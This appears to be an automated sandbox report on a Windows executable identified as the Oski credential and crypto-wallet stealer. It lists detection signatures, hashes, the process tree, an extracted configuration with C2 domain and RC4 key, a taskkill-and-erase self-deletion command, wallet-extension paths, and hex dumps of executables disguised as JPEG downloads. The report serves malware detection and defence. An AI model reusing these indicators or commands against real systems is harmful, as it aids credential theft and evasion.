Loading ...

Play interactive tourEdit tour

Windows Analysis Report buIKlB688e.exe

Overview

General Information

Sample Name:buIKlB688e.exe
Analysis ID:500963
MD5:c7ab84a215a60e703e2906f68a1bae13
SHA1:e1e57a74e28d8016f074da9cda4b68ab04b1737f
SHA256:dda5d47308c0ebcb2555cda19b4c05a88d633396909456b9ee5fcee42e197724
Tags:exeOskiStealer
Infos:

Most interesting Screenshot:

Detection

Oski
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Oski Stealer
Yara detected AntiVM3
Antivirus detection for URL or domain
Tries to steal Crypto Currency Wallets
Downloads files with wrong headers with respect to MIME Content-Type
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Posts data to a JPG file (protocol mismatch)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses taskkill to terminate processes
PE file contains more sections than normal
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • buIKlB688e.exe (PID: 7132 cmdline: 'C:\Users\user\Desktop\buIKlB688e.exe' MD5: C7AB84A215A60E703E2906F68A1BAE13)
    • buIKlB688e.exe (PID: 6076 cmdline: C:\Users\user\Desktop\buIKlB688e.exe MD5: C7AB84A215A60E703E2906F68A1BAE13)
    • buIKlB688e.exe (PID: 5364 cmdline: C:\Users\user\Desktop\buIKlB688e.exe MD5: C7AB84A215A60E703E2906F68A1BAE13)
      • cmd.exe (PID: 5600 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /pid 5364 & erase C:\Users\user\Desktop\buIKlB688e.exe & RD /S /Q C:\\ProgramData\\734573140483756\\* & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5960 cmdline: taskkill /pid 5364 MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup

Malware Configuration

Threatname: Oski

{"C2 url": "chrisproperties.xyz", "RC4 Key": "056139954853430408"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmpJoeSecurity_OskiYara detected Oski StealerJoe Security
    00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.371477115.0000000002E31000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000000.00000002.372435163.0000000003E39000.00000004.00000001.sdmpJoeSecurity_OskiYara detected Oski StealerJoe Security
          Process Memory Space: buIKlB688e.exe PID: 7132JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.buIKlB688e.exe.4038f60.4.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
              5.2.buIKlB688e.exe.400000.0.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
                0.2.buIKlB688e.exe.2e80294.2.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  5.2.buIKlB688e.exe.400000.0.raw.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
                    0.2.buIKlB688e.exe.4038f60.4.raw.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.buIKlB688e.exe.4038f60.4.unpackMalware Configuration Extractor: Oski {"C2 url": "chrisproperties.xyz", "RC4 Key": "056139954853430408"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: buIKlB688e.exeReversingLabs: Detection: 26%
                      Antivirus detection for URL or domainShow sources
                      Source: http://chrisproperties.xyz/3.jpgAvira URL Cloud: Label: phishing
                      Source: http://chrisproperties.xyz/2.jpgAvira URL Cloud: Label: phishing
                      Source: http://chrisproperties.xyz/main.phpAvira URL Cloud: Label: phishing
                      Source: http://chrisproperties.xyz/1.jpgAvira URL Cloud: Label: phishing
                      Source: http://chrisproperties.xyz/7.jpgAvira URL Cloud: Label: phishing
                      Source: http://chrisproperties.xyz/6.jpgAvira URL Cloud: Label: phishing
                      Source: http://chrisproperties.xyz/5.jpgAvira URL Cloud: Label: phishing
                      Source: http://chrisproperties.xyz/4.jpgAvira URL Cloud: Label: phishing
                      Source: 0.2.buIKlB688e.exe.4038f60.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_0041CB10 CryptUnprotectData,LocalAlloc,LocalFree,5_2_0041CB10
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_0041C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,5_2_0041C900
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_0041CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,5_2_0041CBA0
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_0041CD30 _malloc,_malloc,CryptUnprotectData,5_2_0041CD30
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_0041EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,5_2_0041EED0
                      Source: buIKlB688e.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: buIKlB688e.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: buIKlB688e.exe, 00000005.00000003.376829524.000000000336B000.00000004.00000001.sdmp, freebl3.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr
                      Source: Binary string: vcruntime140.i386.pdb source: buIKlB688e.exe, 00000005.00000003.381792597.0000000003321000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: buIKlB688e.exe, 00000005.00000003.381792597.0000000003321000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: buIKlB688e.exe, 00000005.00000003.378362447.00000000033A0000.00000004.00000001.sdmp, msvcp140.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: buIKlB688e.exe, 00000005.00000003.377228818.0000000003346000.00000004.00000001.sdmp, mozglue.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: buIKlB688e.exe, 00000005.00000003.377228818.0000000003346000.00000004.00000001.sdmp, mozglue.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr
                      Source: Binary string: msvcp140.i386.pdb source: buIKlB688e.exe, 00000005.00000003.378362447.00000000033A0000.00000004.00000001.sdmp, msvcp140.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.5.dr
                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: buIKlB688e.exe, 00000005.00000003.376829524.000000000336B000.00000004.00000001.sdmp, freebl3.dll.5.dr
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,5_2_004043DF
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,5_2_00420540
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,5_2_0041E640
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,5_2_0041D360
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_0041F6B0 FindFirstFileExW,5_2_0041F6B0
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 4x nop then add esp, 04h5_2_00423050

                      Networking:

                      barindex
                      Downloads files with wrong headers with respect to MIME Content-TypeShow sources
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:34 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:52 GMT ETag: "235d0-58aa3f702a000" Accept-Ranges: bytes Content-Length: 144848 Vary: User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:34 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Mon, 07 Aug 2017 00:52:20 GMT ETag: "9d9d8-5561f424ef900" Accept-Ranges: bytes Content-Length: 645592 Vary: User-Agent Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 4
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:36 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:00:58 GMT ETag: "519d0-58aa3f3caa680" Accept-Ranges: bytes Content-Length: 334288 Vary: User-Agent Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:37 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:20 GMT ETag: "217d0-58aa3f51a5800" Accept-Ranges: bytes Content-Length: 137168 Vary: User-Agent Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:37 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:30 GMT ETag: "6b738-58aa3f5b2ee80" Accept-Ranges: bytes Content-Length: 440120 Vary: User-Agent Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb 